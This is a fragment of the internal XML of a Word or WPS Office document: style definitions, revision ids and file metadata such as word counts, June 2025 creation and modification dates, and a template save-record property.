    <w:rsid w:val="2B8F5C62"/>
    <w:rsid w:val="33356E93"/>
    <w:rsid w:val="3CBE1515"/>
    <w:rsid w:val="3D19224B"/>
    <w:rsid w:val="4A660DE1"/>
    <w:rsid w:val="62F73177"/>
    <w:rsid w:val="74B27FCA"/>
    <w:rsid w:val="76AF74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HTML Preformatted"/>
    <w:basedOn w:val="1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宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="5">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="4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7">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="8">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="6"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz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1536</Words>
  <Characters>5904</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>143</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6102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2025-06-10T04:55:00Z</dcterms:created>
  <dc:creator>范</dc:creator>
  <cp:lastModifiedBy>范</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-11T04:09:00Z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B766BC728F4E443EA3B14E86B0389948_11</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiMWExMjYzZTNkZWM1YjE4YjdlNzYyYWQ0ZmM0ZWRjODciLCJ1c2VySWQiOiIxNDE1NjkyNzk3In0=</vt:lpwstr>
  </property>
</Properties>
</file>